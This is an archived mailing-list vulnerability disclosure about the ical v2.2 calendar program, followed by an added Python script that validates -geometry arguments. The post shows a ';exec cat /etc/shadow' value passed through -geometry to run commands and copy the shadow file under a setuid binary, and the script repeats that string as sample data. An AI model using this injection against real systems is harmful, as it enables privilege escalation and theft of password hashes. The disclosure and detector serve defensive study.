note: this post is about the ical program (ical v2.2) released by Sanjay Ghemawat, which is a calendar application. Please do not confuse this with iPlanet's iCal server.

ical is a program written in tcl. It seems that when executing the program with the -geometry option and an invalid value for geometry set, it drops a shell where the program was executed. The shell which is executed is the tclsh (TCL Shell). The following is an example of this problem:

  [20:16] / $ ical -geometry invalidvalue
  Application initialization failed: bad geometry specifier "invalidvalue"
  % id
  uid=500(orion) gid=500(orion) groups=500(orion)
  %

By default ical has the following permissions set:

  -rwxr-xr-x 1 root root 276216 Jul 31 2001 /usr/bin/ical-2.2

I decided to set the program setuid to see if the shell was executed after program completion as my user, or before program completion as the root user. When I executed the program again in the same manner as I did before, I got the following:

  [20:16] / $ ical -geometry invalidvalue
  Application initialization failed: bad geometry specifier "invalidvalue"
  % id
  uid=500(orion) gid=500(orion) euid=0(root) groups=500(orion)
  %

It seems to me that the uid which the program is using at this time is used to execute the shell. Since by default the program is not set-uid it is not much of a security issue, although it seems strange to me that it would drop a shell.

Sidenote: when using -geometry ";exec <whatever>" you are able to execute commands and the like. Next to "exec", other tcl shell commands such as "catch" and "set" can be used to manipulate variables.

A quick example of this is (we're still set-uid here):

  [20:33] / $ ls -ail /tmp/shadowfile
  ls: /tmp/shadowfile: No such file or directory
  [20:33] / $ cat /etc/shadow
  cat: /etc/shadow: Permission denied
  [20:33] / $ ical -geometry ";exec cat /etc/shadow >> /tmp/shadowfile"
  [20:33] / $ ls -ail /tmp/shadowfile
  277828 -rw-rw-r-- 1 root orion 969 Aug 18 20:33 /tmp/shadowfile

The above was based on tcl v8.3 and ical v2.2. Possibly other tcl-based programs may have the same issue, allowing an attacker to gain root access.

Sorry if this issue has been posted before, just trying to find out if someone knows of similar issues or not.

Cheers,
Chris.
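As an added example (not part of Chris's post and not ical's own code), the check a wrapper script or a monitoring job can apply to the -geometry argument: accept only strict X11 geometry syntax, so that "invalidvalue" and the ";exec ..." form quoted above are both refused before they ever reach the Tk option parser. The sample command lines are constructed for the example.

```python
import re
import shlex

# Strict X11 geometry grammar: [=][<width>x<height>][{+-}<xoff>{+-}<yoff>]
# Nothing but digits, 'x', '+', '-' and an optional leading '=' is allowed,
# so a Tcl fragment such as ';exec cat /etc/shadow' can never match.
_GEOMETRY_RE = re.compile(
    r"^=?(?:(?P<w>\d+)x(?P<h>\d+))?(?:(?P<x>[+-]\d+)(?P<y>[+-]\d+))?$"
)

def parse_geometry(value):
    """Return the geometry fields as a dict (absent fields are None), or None
    when the value is not a strict X11 geometry specifier."""
    m = _GEOMETRY_RE.match(value)
    if m is None or value in ("", "="):   # the regex also matches the empty forms
        return None
    return {k: (int(v) if v is not None else None) for k, v in m.groupdict().items()}

def scan_command_lines(lines):
    """Flag command lines whose -geometry argument is not valid X11 geometry;
    returns (line, value) pairs, value None when the option has no argument."""
    hits = []
    for line in lines:
        try:
            argv = shlex.split(line)
        except ValueError:            # unbalanced quotes: treat as suspicious
            hits.append((line, None))
            continue
        for i, tok in enumerate(argv):
            if tok != "-geometry":
                continue
            value = argv[i + 1] if i + 1 < len(argv) else None
            if value is None or parse_geometry(value) is None:
                hits.append((line, value))
            break
    return hits

# Constructed sample lines (e.g. from process accounting or a shell history),
# modelled on the invocations quoted in the post above.
SAMPLE_LINES = [
    'ical -geometry 80x24+10+10',
    'ical -geometry invalidvalue',
    'ical -geometry ";exec cat /etc/shadow >> /tmp/shadowfile"',
    'xterm -geometry =100x40-0+0',
]

if __name__ == "__main__":
    for line, value in scan_command_lines(SAMPLE_LINES):
        print("flagged: %s  (-geometry value: %r)" % (line, value))
```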
This archive was generated by hypermail 2b30 : Sat Mar 23 2002 - 13:27:44 PST